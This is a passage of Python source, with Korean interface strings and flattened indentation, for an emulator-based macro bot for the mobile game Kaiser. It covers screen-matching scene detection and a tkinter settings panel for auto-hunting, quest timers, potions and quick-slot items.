'자동 사냥',
'메인 퀘스트',
'지역 퀘스트',
'퀵슬롯 등록',
'퀘스트',
'우편',
'일괄 분해',
'알림',
'[반복 시작]',
'[반복 종료]',
'[작업 대기]',
'[작업 예약]',
'' ]
nox_kaiser_icon_list = [
'nox_kaiser_icon'
]
momo_kaiser_icon_list = [
'momo_kaiser_icon'
]
character_move_list = [
"↑",
"↗",
"→",
"↘",
"↓",
"↙",
"←",
"↖"
]
slot_item_list = [
'없음',
'소형 체력 물약',
'중형 체력 물약',
'속도의 물약',
'전투의 물약',
'증폭 마법석',
'펫 소환 주문서',
]
def __init__(self, game_name, game_data_name, window):
lybgame.LYBGame.__init__(self, lybconstant.LYB_GAME_KAISER, lybconstant.LYB_GAME_DATA_KAISER, window)
def process(self, window_image):
    return super(LYBKaiser, self).process(window_image)
def custom_check(self, window_image, window_pixel):
pb_name = 'skip'
(loc_x, loc_y), match_rate = self.locationOnWindowPart(
self.window_image,
self.resource_manager.pixel_box_dic[pb_name],
custom_below_level=(130, 130, 130),
custom_top_level=(255, 255, 255),
custom_threshold=0.9,
custom_flag=1,
custom_rect=(560, 240, 600, 280)
)
if loc_x != -1:
self.logger.warn('건너뛰기: ' + str(match_rate))
self.mouse_click(pb_name)
# Defeat!
# (loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
# self.window_image,
# 'defeat_press_key_loc',
# custom_below_level=(250, 250, 250),
# custom_top_level=(255, 255, 255),
# custom_threshold=0.7,
# custom_flag=1,
# custom_rect=(280, 190, 360, 230)
# )
# if loc_x != -1:
# self.logger.warn('전투 패배: ' + str(match_rate))
# self.mouse_click('defeat_press_key_0')
return ''
def get_screen_by_location(self, window_image):
scene_name = self.scene_init_screen(window_image)
if len(scene_name) > 0:
return scene_name
scene_name = self.popup_scene(window_image)
if len(scene_name) > 0:
return scene_name
# scene_name = self.jeontoo_scene(window_image)
# if len(scene_name) > 0:
# return scene_name
# scene_name = self.scene_google_play_account_select(window_image)
# if len(scene_name) > 0:
# return scene_name
return ''
def popup_scene(self, window_image):
loc_name = 'popup_scene_loc'
match_rate = self.rateMatchedResource(self.window_pixels, loc_name, custom_below_level=100, custom_top_level=255)
self.logger.debug(loc_name + ' ' + str(match_rate))
if match_rate > 0.7:
return 'popup_scene'
return ''
# def jeontoo_scene(self, window_image):
# (loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
# self.window_image,
# 'jeontoo_scene_loc',
# custom_below_level=(100, 100, 100),
# custom_top_level=(255, 255, 255),
# custom_threshold=0.7,
# custom_flag=1,
# custom_rect=(5, 90, 80, 130)
# )
# if match_rate > 0.7:
# return 'jeontoo_scene'
# return ''
def scene_init_screen(self, window_image):
loc_x = -1
loc_y = -1
if self.player_type == 'nox':
for each_icon in LYBKaiser.nox_kaiser_icon_list:
(loc_x, loc_y), match_rate = self.locationOnWindowPart(
window_image,
self.resource_manager.pixel_box_dic[each_icon],
custom_threshold=0.8,
custom_flag=1,
custom_rect=(80, 110, 570, 300)
)
# print('[DEBUG] nox yh icon:', (loc_x, loc_y), match_rate)
if loc_x != -1:
break
elif self.player_type == 'momo':
for each_icon in LYBKaiser.momo_kaiser_icon_list:
(loc_x, loc_y), match_rate = self.locationOnWindowPart(
window_image,
self.resource_manager.pixel_box_dic[each_icon],
custom_threshold=0.8,
custom_flag=1,
custom_rect=(30, 10, 610, 300)
)
# print('[DEBUG] momo yh icon:', (loc_x, loc_y), match_rate)
if loc_x != -1:
break
if loc_x == -1:
return ''
return 'init_screen_scene'
def scene_google_play_account_select(self, window_image):
loc_x_list = []
loc_y_list = []
(loc_x, loc_y) = lybgame.LYBGame.locationOnWindow(
window_image,
self.resource_manager.pixel_box_dic['google_play_letter']
)
loc_x_list.append(loc_x)
loc_y_list.append(loc_y)
for i in range(6):
(loc_x, loc_y) = lybgame.LYBGame.locationOnWindow(
window_image,
self.resource_manager.pixel_box_dic['google_play_letter_' + str(i)]
)
loc_x_list.append(loc_x)
loc_y_list.append(loc_y)
for each_loc in loc_x_list:
    if each_loc == -1:
        return ''
return 'google_play_account_select_scene'
def clear_scene(self):
last_scene = self.scene_dic
self.scene_dic = {}
for scene_name, scene in last_scene.items():
if ( 'google_play_account_select_scene' in scene_name or
'logo_screen_scene' in scene_name or
'connect_account_scene' in scene_name
):
self.scene_dic[scene_name] = last_scene[scene_name]
def add_scene(self, scene_name):
self.scene_dic[scene_name] = lybscene.LYBKaiserScene(scene_name)
self.scene_dic[scene_name].setLoggingQueue(self.logging_queue)
self.scene_dic[scene_name].setGameObject(self)
class LYBKaiserTab(lybgame.LYBGameTab):
def __init__(self, root_frame, configure, game_options, inner_frame_dics, width, height, game_name=lybconstant.LYB_GAME_KAISER):
lybgame.LYBGameTab.__init__(self, root_frame, configure, game_options, inner_frame_dics, width, height, game_name)
def set_work_list(self):
lybgame.LYBGameTab.set_work_list(self)
for each_work in LYBKaiser.work_list:
self.option_dic['work_list_listbox'].insert('end', each_work)
self.configure.common_config[self.game_name]['work_list'].append(each_work)
def set_option(self):
###############################################
# Main quest progress #
###############################################
# frame = ttk.Frame(self.inner_frame_dic['frame_top'], relief=self.frame_relief)
# label = tkinter.Label(
# master = frame,
# text = "메인 퀘스트를 ",
# anchor = tkinter.W,
# justify = tkinter.LEFT,
# font = lybconstant.LYB_FONT
# # fg='White' if brightness < 120 else 'Black',
# # bg=bg_colour
# )
# # countif.place(
# # x=lybconstant.LYB_PADDING,
# # y=lybconstant.LYB_PADDING,
# # width=lybconstant.LYB_LABEL_WIDTH, height=lybconstant.LYB_LABEL_HEIGHT
# # )
# label.pack(side=tkinter.LEFT)
# option_name_mq = lybconstant.LYB_DO_STRING_DURATION_MAIN_QUEST
# self.option_dic[option_name_mq] = tkinter.StringVar(frame)
# self.option_dic[option_name_mq].trace('w', lambda *args: self.callback_main_quest_stringvar(args, option_name=option_name_mq))
# if not option_name_mq in self.configure.common_config[self.game_name]:
# self.configure.common_config[self.game_name][option_name_mq] = 20
# entry = tkinter.Entry(
# master = frame,
# relief = 'sunken',
# textvariable = self.option_dic[option_name_mq],
# justify = tkinter.RIGHT,
# width = 5,
# font = lybconstant.LYB_FONT
# )
# entry.pack(side=tkinter.LEFT)
# label = tkinter.Label(
# master = frame,
# text = "분 동안 진행합니다.",
# justify = tkinter.LEFT,
# font = lybconstant.LYB_FONT
# # fg='White' if brightness < 120 else 'Black',
# # bg=bg_colour
# )
# label.pack(side=tkinter.LEFT)
# frame.pack(anchor=tkinter.W)
# PADDING
frame = ttk.Frame(
master = self.master,
relief = self.frame_relief
)
frame.pack(pady=5)
self.inner_frame_dic['options'] = ttk.Frame(
master = self.master,
relief = self.frame_relief
)
self.option_dic['option_note'] = ttk.Notebook(
master = self.inner_frame_dic['options']
)
self.inner_frame_dic['common_tab_frame'] = ttk.Frame(
master = self.option_dic['option_note'],
relief = self.frame_relief
)
self.inner_frame_dic['common_tab_frame'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.option_dic['option_note'].add(self.inner_frame_dic['common_tab_frame'], text='일반')
self.inner_frame_dic['work_tab_frame'] = ttk.Frame(
master = self.option_dic['option_note'],
relief = self.frame_relief
)
self.inner_frame_dic['work_tab_frame'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.option_dic['option_note'].add(self.inner_frame_dic['work_tab_frame'], text='작업')
self.inner_frame_dic['notify_tab_frame'] = ttk.Frame(
master = self.option_dic['option_note'],
relief = self.frame_relief
)
self.inner_frame_dic['notify_tab_frame'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.option_dic['option_note'].add(self.inner_frame_dic['notify_tab_frame'], text='알림')
# ------
# General tab: left column
frame_l = ttk.Frame(self.inner_frame_dic['common_tab_frame'])
frame_label = ttk.LabelFrame(frame_l, text='설정')
frame_label_inner = ttk.LabelFrame(frame_label, text='소형 체력 물약')
frame = ttk.Frame(frame_label_inner)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_set'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_set'].trace(
'w', lambda *args: self.callback_auto_potion_set(args, lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_set')
)
if not lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_set' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_set'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '물약 소진시 현재 작업 종료',
variable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_set'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label_inner)
label = ttk.Label(
master = frame,
text = self.get_option_text("물약 슬롯 번호")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_number'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_number'].trace(
'w', lambda *args: self.callback_auto_potion_number(args, lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_number')
)
combobox_list = []
for i in range(1, 5):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_number' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_number'] = 1
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_number'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_number'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame_label_inner.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_label_inner = ttk.LabelFrame(frame_label, text='수동 체력 물약')
frame = ttk.Frame(frame_label_inner)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_set'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_set'].trace(
'w', lambda *args: self.callback_potion_set(args, lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_set')
)
if not lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_set' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_set'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '물약 소진시 현재 작업 종료',
variable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_set'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label_inner)
label = ttk.Label(
master = frame,
text = self.get_option_text("수동 회복 물약 사용(HP %)")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_hp'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_hp'].trace(
'w', lambda *args: self.callback_potion_hp(args, lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_hp')
)
combobox_list = []
for i in range(50, 91):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_hp' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_hp'] = 70
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_hp'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_hp'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label_inner)
label = ttk.Label(
master = frame,
text = self.get_option_text("수동 회복 물약 슬롯 번호")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_number'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_number'].trace(
'w', lambda *args: self.callback_potion_number(args, lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_number')
)
combobox_list = []
for i in range(1, 5):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_number' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_number'] = 2
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_number'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_number'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame_label_inner.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_l.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# General tab: middle column
frame_m = ttk.Frame(self.inner_frame_dic['common_tab_frame'])
frame_m.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# General tab: right column
frame_r = ttk.Frame(self.inner_frame_dic['common_tab_frame'])
frame_r.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# Work tab: left column
frame_l = ttk.Frame(self.inner_frame_dic['work_tab_frame'])
frame_label = ttk.LabelFrame(frame_l, text='자동 사냥')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("진행 시간(초)")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_play_duration'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_play_duration'].trace(
'w', lambda *args: self.callback_auto_play_duration(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_play_duration')
)
combobox_list = []
for i in range(0, 86401, 60):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_play_duration' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_play_duration'] = 1800
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_play_duration'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_play_duration'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("자동 전환 감지 횟수")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_limit_count'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_limit_count'].trace(
'w', lambda *args: self.callback_auto_limit_count(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_limit_count')
)
combobox_list = []
for i in range(2, 101):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_limit_count' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_limit_count'] = 5
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_limit_count'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_limit_count'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_l, text='메인 퀘스트')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("진행 시간(초)")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_duration'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_duration'].trace(
'w', lambda *args: self.callback_main_quest_duration(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_duration')
)
combobox_list = []
for i in range(0, 86401, 60):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_duration' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_duration'] = 1800
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_duration'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_duration'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("퀘스트 지역 이탈 판정 횟수")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_distance'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_distance'].trace(
'w', lambda *args: self.callback_main_quest_distance(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_distance')
)
combobox_list = []
for i in range(1, 101):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_distance' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_distance'] = 3
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_distance'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_distance'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("자동 전환 감지 횟수")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_auto'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_auto'].trace(
'w', lambda *args: self.callback_main_quest_auto(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_auto')
)
combobox_list = []
for i in range(2, 101):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_auto' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_auto'] = 5
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_auto'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_auto'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_l, text='지역 퀘스트')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("진행 시간(초)")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_duration'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_duration'].trace(
'w', lambda *args: self.callback_local_quest_duration(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_duration')
)
combobox_list = []
for i in range(0, 86401, 60):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_duration' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_duration'] = 1800
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_duration'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_duration'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("퀘스트 지역 이탈 판정 거리(m)")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance_limit'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance_limit'].trace(
'w', lambda *args: self.callback_local_quest_distance_limit(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance_limit')
)
combobox_list = []
for i in range(1, 11):
combobox_list.append(str(i * 10))
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance_limit' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance_limit'] = 40
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance_limit'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance_limit'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("퀘스트 지역 이탈 판정 횟수")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance'].trace(
'w', lambda *args: self.callback_local_quest_distance(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance')
)
combobox_list = []
for i in range(1, 101):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance'] = 60
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("자동 전환 감지 횟수")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_auto'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_auto'].trace(
'w', lambda *args: self.callback_local_quest_auto(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_auto')
)
combobox_list = []
for i in range(2, 101):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_auto' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_auto'] = 5
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_auto'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_auto'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("현상 수배 퀘스트 수락 번호")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_wanted_number'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_wanted_number'].trace(
'w', lambda *args: self.callback_local_quest_wanted_number(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_wanted_number')
)
combobox_list = []
for i in range(0, 4):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_wanted_number' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_wanted_number'] = 1
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_wanted_number'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_wanted_number'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_l.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# Work tab: middle column
frame_m = ttk.Frame(self.inner_frame_dic['work_tab_frame'])
frame_label = ttk.LabelFrame(frame_m, text='퀵슬롯 등록')
frame_label_inner = ttk.LabelFrame(frame_label, text='퀵슬롯 번호')
frame = ttk.Frame(frame_label_inner)
label = ttk.Label(
master = frame,
text = "⑨ ⑩ ⑪ ⑫"
)
label.pack()
frame.pack()
frame = ttk.Frame(frame_label_inner)
label = ttk.Label(
master = frame,
text = "⑤ ⑥ ⑦ ⑧"
)
label.pack()
frame.pack()
frame = ttk.Frame(frame_label_inner)
label = ttk.Label(
master = frame,
text = "① ② ③ ④"
)
label.pack()
frame.pack()
frame_label_inner.pack(padx=5, pady=5)
for i in range(12):
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text(str(i + 1)+'.', width=3)
)
label.pack(side=tkinter.LEFT)
option_name = lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + str(i)
self.option_dic[option_name] = tkinter.StringVar(frame)
# Each slot has a dedicated callback_work_slot_item_<i> method; default
# arguments capture the per-iteration callback and option name.
callback = getattr(self, 'callback_work_slot_item_' + str(i))
self.option_dic[option_name].trace(
    'w', lambda *args, cb=callback, name=option_name: cb(args, name))
combobox_list = LYBKaiser.slot_item_list
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + str(i) in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + str(i)] = combobox_list[0]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + str(i)],
state = "readonly",
height = 10,
width = 28,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + str(i)])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_m.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# Work tab: right column
frame_r = ttk.Frame(self.inner_frame_dic['work_tab_frame'])
frame_r.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# Notify tab: left column
frame_l = ttk.Frame(self.inner_frame_dic['notify_tab_frame'])
frame_label = ttk.Frame(frame_l)
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quickslot_item_empty'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quickslot_item_empty'].trace(
